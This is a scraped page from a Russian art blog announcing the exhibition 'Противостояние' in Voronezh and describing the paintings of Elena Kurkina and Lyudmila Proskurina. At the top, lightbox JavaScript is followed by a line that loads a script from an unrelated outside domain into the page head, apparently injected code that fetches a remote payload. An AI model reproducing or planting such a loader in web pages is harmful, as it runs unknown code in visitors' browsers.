, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Выставка «Противостояние»

Автор: Дмитрий Алмазов | 10 Апр 2014

Выставка "Противостояние", ВоронежДобрый день!

Хочу представить вашему вниманию новую выставку под названием "Противостояние". Её куратором и организатором  является Дмитрий Алмазов - руководитель проекта "Лаборатория Искусства".

г. Воронеж, ул. Красноармейская, д. 21а

Ресторан "Медитерра"

Начало 24 апреля  в 19-00

Противостояние? Вы разве не задумались: почему именно оно? Спешу ответить на ваш вопрос. Смысл нашего названия раскрывается в поединке двух замечательных художниц: Куркиной Елены и Проскуриной Людмилы.

Куркина Елена - сюрреалистическая фея. Она прекрасно экспериментирует с несколькими направлениями: авангардизмом, кубизмом, сюрреализмом. Елена создает не только портреты, но и Картина Куркиной Еленыпишет полотна с городской тематикой. В этих городских полотнах художница, на мой взгляд, старается передать стиль двух великих сюрреалистов - Рене Магритта и Сальвадора Дали. От Рене Магритта Елена заимствует содержание и тематику полотен. Бельгийский художник так же, как и наша фея, любил использовать в своих картинах синие и бежевые тона. А вот от Сальвадора Дали художница позаимствовала плавные линии, которые проявляются в лестницах и арках. Посмотришь на них и сразу вспоминаешь картину " Постоянство памяти". Еще в творчестве Елены мне очень понравилась картина " Их встреча". Картина безумно яркая и самобытная. Мне она напоминает работы Марка Шагала. Полотно - замечательное! Его можно рассматривать несколько часов подряд, удивляясь  неподражаемой прописью.

Людмила Проскурина - это акварельная нимфа. Художница создает сказочные, акварельные этюды. Сюжеты ее полотен самые разнообразные. На холстах встречаются и цветы, и воронежские пейзажи, и зарисовки к литературным произведениям, и натюрморты. Но истинным пристрастием Людмилы являются цветы. Они присутствуют во всех ипостасях: весенние, осенние, зимнее, летнее цветы; и еще Герберы, Проскурина Людмилапредстает перед нами цветы в вазах, на столе, на лугах. Труды нашей нимфы напоминают работы Михаила Врубеля. Великий символист любил использовать эффект приглушенных тонов. Этот прием переняла наша художница. Ярче всего он проявляется в полотне под названием " Герберы". Светлые, нежные розовые и серые оттенки гармонируют с мягкой, приглушенной тенью. Композиция расположена на краю стола, что дает возможность сосредоточить наш взгляд на эпицентре холста - на герберах. Красная овальная ваза и папоротник на заднем фоне вносят небольшой диссонанс в картину, который притягивает наш взгляд к мистической и очаровательной живописи акварельной феи.

Если вас заинтересовало творчество наших художниц, то хочу пригласить вас на их персональную выставку, которая будет проходить ресторан Медитерра.

До встречи на нашем вернисаже!

Вконтакте - http://vk.com/art_protivostojanie

Facebook -  https://www.facebook.com/events/234680176737159/

По всем вопросам можно связаться по тел. 8(960)134-46-27 или написать письмо на странице контакты.

Алла Битюцкая

Темы: Арт Воронеж, Новости | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress